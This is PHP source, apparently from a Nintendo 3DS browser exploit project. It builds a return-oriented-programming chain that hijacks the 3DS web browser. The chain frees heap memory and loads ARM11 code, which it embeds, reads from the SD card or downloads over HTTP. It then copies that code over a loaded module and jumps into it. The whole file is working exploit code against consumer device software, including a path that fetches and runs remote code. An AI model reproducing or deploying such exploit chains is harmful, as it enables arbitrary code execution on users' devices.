function browserhaxcfg_parsebinparam() { global $getbinparam, $getbinselect; //This parses $getbinparam which comes from the "getbin" URL param, and initializes $getbinselect when matching value(s) for $getbinparam are found. if ($getbinparam == browserhaxcfg_getbinparam_type3()) { $getbinselect = 3; //3dsbrowserhax_common.php only uses $getbinselect value3 currently. } }
function generateropchain_type2() { global $ROPHEAP, $POPLRPC, $POPPC, $ROP_POP_R0R6PC, $ROP_POP_R1R5PC, $OSSCRO_HEAPADR, $OSSCRO_MAPADR, $APPHEAP_PHYSADDR, $svcControlMemory, $ROP_MEMSETOTHER, $IFile_Open, $IFile_Read, $IFile_Write, $IFile_Close, $IFile_GetSize, $IFile_Seek, $GSP_FLUSHDCACHE, $GXLOW_CMD4, $svcSleepThread, $THROW_FATALERR, $SRVPORT_HANDLEADR, $SRV_REFCNT, $srvpm_initialize, $srv_shutdown, $srv_GetServiceHandle, $GSP_WRITEHWREGS, $GSPGPU_SERVHANDLEADR, $APT_DoApplicationJump, $arm11code_loadfromsd, $browserver, $FS_MOUNTSDMC, $ROP_snprintf, $ROP_curl_easy_cleanup, $ROP_curl_easy_init, $ROP_curl_easy_perform, $ROP_curl_easy_setopt; $LINEAR_TMPBUF = 0x18b40000; $LINEAR_VADDRBASE = 0x14000000; if ($browserver >= 0x80) { $LINEAR_TMPBUF = 0x3a45c000; $LINEAR_VADDRBASE = 0x30000000; } $LINEAR_CODETMPBUF = $LINEAR_TMPBUF + 0x1000; $OSSCRO_PHYSADDR = $OSSCRO_HEAPADR - 0x8000000 + $APPHEAP_PHYSADDR; $LINEARADR_OSSCRO = $OSSCRO_PHYSADDR - 0x20000000 + $LINEAR_VADDRBASE; $LINEARADR_CODESTART = $LINEARADR_OSSCRO + 0x6e0; $CODESTART_MAPADR = $OSSCRO_MAPADR + 0x6e0; $codebinsize = 0x8000; $IFile_ctx = $ROPHEAP; ropgen_writeu32($ROPHEAP, 0x100ffff, 0, 1); ropgen_callfunc(0x1ed02a04 - 0x1eb00000, $ROPHEAP, 0x4, 0x0, $POPPC, $GSP_WRITEHWREGS); //Set the sub-screen colorfill reg so that yellow is displayed. ropgen_callfunc($LINEAR_TMPBUF, 0x11000, 0x0, 0x0, $POPPC, $ROP_MEMSETOTHER); if ($arm11code_loadfromsd >= 1 && $browserver >= 0x80) { ropgen_writeu32($ROPHEAP, 0x636d6473, 0, 1); ropgen_writeu32($ROPHEAP + 4, 0x3a, 0, 1); ropgen_callfunc($ROPHEAP, 0x0, 0x0, 0x0, $POPPC, $FS_MOUNTSDMC); ropgen_condfatalerr(); } if ($browserver >= 0x80) { ropchain_appendu32($POPLRPC); ropchain_appendu32($ROP_POP_R0R6PC); ropchain_appendu32($ROP_POP_R0R6PC); ropchain_appendu32($ROPHEAP); //r0 outaddr ropchain_appendu32(0xa000000); //r1 addr0 ropchain_appendu32(0x0); //r2 addr1 ropchain_appendu32(0x800000); //r3 size ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 ropchain_appendu32($svcControlMemory); //Free 8MB of heap under SKATER. ropchain_appendu32(0x1); //sp0 operation ropchain_appendu32(0x0); //sp4 permissions ropchain_appendu32(0x0); //sp8 ropchain_appendu32(0x8); //sp12 ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 } if ($arm11code_loadfromsd == 0) { $data_arr = getcodebin_array(browserhaxcfg_getbinpath_ropchain2(), 0x540); ropgen_writeregdata_wrap($LINEAR_CODETMPBUF, $data_arr, 0, 0x540); } else { if ($arm11code_loadfromsd == 1) { ropgen_callfunc($IFile_ctx, 0x14, 0x0, 0x0, $POPPC, $ROP_MEMSETOTHER); //Clear the IFile ctx. /*$databuf = array(); $databuf[0] = 0x640073; $databuf[1] = 0x63006d; $databuf[2] = 0x2f003a; $databuf[3] = 0x720061; $databuf[4] = 0x31006d; $databuf[5] = 0x630031; $databuf[6] = 0x64006f; $databuf[7] = 0x2e0065; $databuf[8] = 0x690062; $databuf[9] = 0x6e;*/ $databuf = string_gendata_array("sdmc:/arm11code.bin", 1, 0x40); ropgen_writeregdata_wrap($ROPHEAP + 0x40, $databuf, 0, 0x28); //Write the following utf16 string to ROPHEAP+0x40: "sdmc:/arm11code.bin". ropgen_callfunc($IFile_ctx, $ROPHEAP + 0x40, 0x1, 0x0, $POPPC, $IFile_Open); //Open the above file. //ropchain_appendu32(0x50505050); ropgen_condfatalerr(); ropgen_callfunc($IFile_ctx, $ROPHEAP + 0x20, $LINEAR_CODETMPBUF, $codebinsize, $POPPC, $IFile_Read); //Read the file to $LINEAR_CODETMPBUF with size $codebinsize, actual size must be <=$codebinsize. //ropchain_appendu32(0x40404040); ropgen_condfatalerr(); ropgen_readu32($IFile_ctx, 0, 1); ropchain_appendu32($POPLRPC); ropchain_appendu32($POPPC); //lr ropchain_appendu32($ROP_POP_R1R5PC); ropchain_appendu32(0x0); //r1 ropchain_appendu32(0x0); //r2 ropchain_appendu32(0x0); //r3 ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32($IFile_Close); } else { if ($arm11code_loadfromsd == 2) { ropgen_httpdownload_binary($LINEAR_CODETMPBUF, $codebinsize, browserhaxcfg_getbinparam_type3()); } } } ropgen_callfunc($LINEAR_CODETMPBUF, $codebinsize, 0x0, 0x0, $POPPC, $GSP_FLUSHDCACHE); //Flush the data-cache for the loaded code. if (!isset($SRVPORT_HANDLEADR)) { $SRVPORT_HANDLEADR = 0x0; } if (!isset($SRV_REFCNT)) { $SRV_REFCNT = 0x0; } if (!isset($srvpm_initialize)) { $srvpm_initialize = 0x0; } if (!isset($srv_shutdown)) { $srv_shutdown = 0x0; } if (!isset($ROP_snprintf)) { $ROP_snprintf = 0x0; } $databuf = array(); $databuf[0] = 0x0; $databuf[1] = $THROW_FATALERR; $databuf[2] = $SRVPORT_HANDLEADR; $databuf[3] = $SRV_REFCNT; $databuf[4] = $srvpm_initialize; $databuf[5] = $srv_shutdown; $databuf[6] = $srv_GetServiceHandle; $databuf[7] = $GXLOW_CMD4; $databuf[8] = $GSP_FLUSHDCACHE; $databuf[9] = $IFile_Open; $databuf[10] = $IFile_Close; $databuf[11] = $IFile_GetSize; $databuf[12] = $IFile_Seek; $databuf[13] = $IFile_Read; $databuf[14] = $IFile_Write; $databuf[15] = $GSP_WRITEHWREGS; $databuf[16] = 0; //$APT_PrepareToDoApplicationJump; $databuf[17] = 0; //$APT_DoApplicationJump; if ($browserver < 0x80) { $databuf[18] = 0x40; } //flags if ($browserver >= 0x80) { $databuf[18] = 0x48; } $databuf[19] = 0x0; $databuf[20] = 0x0; $databuf[21] = 0x0; $databuf[22] = $GSPGPU_SERVHANDLEADR; //GSPGPU handle* $databuf[23] = 0x114; //NS appID $databuf[24] = 0; $databuf[25] = $LINEAR_CODETMPBUF; $databuf[26] = $ROP_snprintf; $databuf[27] = $ROP_curl_easy_cleanup; //Using these libcurl functions from the arm11code payload is not recommended: these are broken due to the payload overwriting oss.cro. $databuf[28] = $ROP_curl_easy_init; $databuf[29] = $ROP_curl_easy_perform; $databuf[30] = $ROP_curl_easy_setopt; ropgen_writeregdata_wrap($LINEAR_TMPBUF, $databuf, 0, 31 * 4); ropchain_appendu32($POPLRPC); ropchain_appendu32($ROP_POP_R0R6PC); ropchain_appendu32($ROP_POP_R0R6PC); ropchain_appendu32($LINEAR_CODETMPBUF); //r0 srcaddr ropchain_appendu32($LINEARADR_CODESTART); //r1 dstaddr ropchain_appendu32($codebinsize); //r2 size ropchain_appendu32(0x0); //r3 width0 ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 ropchain_appendu32($GXLOW_CMD4); //Copy the loaded code to the start of the CRO. ropchain_appendu32(0x0); //sp0 height0 ropchain_appendu32(0x0); //sp4 width1 ropchain_appendu32(0x0); //sp8 height1 ropchain_appendu32(0x8); //sp12 flags ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 ropchain_appendu32($POPLRPC); //Delay 1 second while the above copy-command is being processed, then jump to that code. ropchain_appendu32($POPPC); ropchain_appendu32($ROP_POP_R0R6PC); ropchain_appendu32(1000000000); //r0 ropchain_appendu32(0x0); //r1 ropchain_appendu32(0x0); //r2 ropchain_appendu32(0x0); //r3 ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 ropchain_appendu32($svcSleepThread); ropgen_writeu32($ROPHEAP, 0x1808080, 0, 1); ropgen_callfunc(0x1ed02a04 - 0x1eb00000, $ROPHEAP, 0x4, 0x0, $ROP_POP_R0R6PC, $GSP_WRITEHWREGS); //Set the sub-screen colorfill reg so that gray is displayed. ropchain_appendu32($LINEAR_TMPBUF); //r0 ropchain_appendu32(0x10000000 - 0x7000); //r1 (relocated stack-top if needed by the payload) ropchain_appendu32(0x0); //r2 ropchain_appendu32(0x0); //r3 ropchain_appendu32(0x0); //r4 ropchain_appendu32(0x0); //r5 ropchain_appendu32(0x0); //r6 ropchain_appendu32($POPLRPC); ropchain_appendu32($POPPC); ropchain_appendu32($CODESTART_MAPADR); ropchain_appendu32(0x70707070); }